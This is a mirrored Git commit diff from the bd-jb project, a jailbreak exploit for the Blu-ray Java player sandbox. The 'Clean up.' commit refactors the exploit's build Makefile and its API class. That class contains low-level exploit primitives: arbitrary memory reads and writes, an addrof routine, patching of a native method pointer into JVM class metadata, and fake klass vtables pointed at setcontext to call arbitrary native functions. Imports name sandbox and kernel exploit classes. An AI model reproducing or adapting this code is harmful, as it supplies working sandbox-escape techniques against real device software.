mirror of
https://github.com/TheOfficialFloW/bd-jb
synced 2024-11-21 16:35:05 -05:00
Clean up.
This commit is contained in:
parent
9dcf0bfe7f
commit
8d7ad41156
4
Makefile
4
Makefile
@ -28,7 +28,7 @@ CLASSES = \
|
||||
|
||||
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
||||
|
||||
all: directory serialized classes jar bdmv
|
||||
all: directory serialized classes jar bdjo_bdmv
|
||||
|
||||
directory:
|
||||
mkdir -p $(BUILD)
|
||||
@ -47,7 +47,7 @@ jar:
|
||||
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
||||
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
||||
|
||||
bdmv:
|
||||
bdjo_bdmv:
|
||||
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
||||
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
||||
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
|
||||
|
@ -81,6 +81,10 @@ public final class API {
|
||||
|
||||
private native long multiNewArray(long componentType, int[] dimensions);
|
||||
|
||||
public boolean isJdk11() {
|
||||
return jdk11;
|
||||
}
|
||||
|
||||
private void init() throws Exception {
|
||||
initUnsafe();
|
||||
initDlsym();
|
||||
@ -112,6 +116,7 @@ public final class API {
|
||||
}
|
||||
|
||||
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
|
||||
|
||||
findMethod.setAccessible(true);
|
||||
handleField.setAccessible(true);
|
||||
|
||||
@ -174,6 +179,7 @@ public final class API {
|
||||
long apiInstance = addrof(this);
|
||||
long apiKlass = read64(apiInstance + 0x08);
|
||||
|
||||
boolean installed = false;
|
||||
if (jdk11) {
|
||||
long methods = read64(apiKlass + 0x170);
|
||||
int numMethods = read32(methods + 0x00);
|
||||
@ -194,7 +200,8 @@ public final class API {
|
||||
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
||||
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
||||
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
|
||||
return;
|
||||
installed = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
@ -217,14 +224,26 @@ public final class API {
|
||||
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
||||
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
||||
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
|
||||
return;
|
||||
installed = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (!installed) {
|
||||
throw new IllegalStateException("Could not install native method.");
|
||||
}
|
||||
|
||||
// Invoke call method many times to kick in optimization.
|
||||
train();
|
||||
}
|
||||
|
||||
private void train() {
|
||||
for (int i = 0; i < 10000; i++) {
|
||||
call(0);
|
||||
}
|
||||
}
|
||||
|
||||
private void buildContext(
|
||||
long contextBuf,
|
||||
long jmpBuf,
|
||||
@ -262,12 +281,6 @@ public final class API {
|
||||
write64(contextBuf + 0x118, 0);
|
||||
}
|
||||
|
||||
public void train() {
|
||||
for (int i = 0; i < 10000; i++) {
|
||||
call(0);
|
||||
}
|
||||
}
|
||||
|
||||
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
|
||||
long fakeClassOop = malloc(INT64_SIZE);
|
||||
long fakeClass = malloc(0x100);
|
||||
@ -278,11 +291,6 @@ public final class API {
|
||||
throw new IllegalStateException("Could not allocate memory.");
|
||||
}
|
||||
|
||||
write64(fakeClassOop, 0);
|
||||
memset(fakeClass, 0, 0x100);
|
||||
memset(fakeKlass, 0, 0x200);
|
||||
memset(fakeKlassVtable, 0, 0x400);
|
||||
|
||||
try {
|
||||
long ret = 0;
|
||||
|
||||
@ -306,11 +314,14 @@ public final class API {
|
||||
} else {
|
||||
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
|
||||
}
|
||||
|
||||
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
||||
|
||||
if (i == 0) {
|
||||
buildContext(
|
||||
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
||||
}
|
||||
}
|
||||
} else {
|
||||
write64(fakeClassOop + 0x00, fakeClass);
|
||||
write64(fakeClass + 0x68, fakeKlass);
|
||||
@ -326,12 +337,15 @@ public final class API {
|
||||
} else {
|
||||
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
|
||||
}
|
||||
|
||||
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
||||
|
||||
if (i == 0) {
|
||||
buildContext(
|
||||
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (ret == 0) {
|
||||
return 0;
|
||||
|
@ -7,11 +7,11 @@
|
||||
|
||||
package com.bdjb;
|
||||
|
||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
|
||||
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
|
||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
import java.io.OutputStream;
|
||||
|
Loading…
Reference in New Issue
Block a user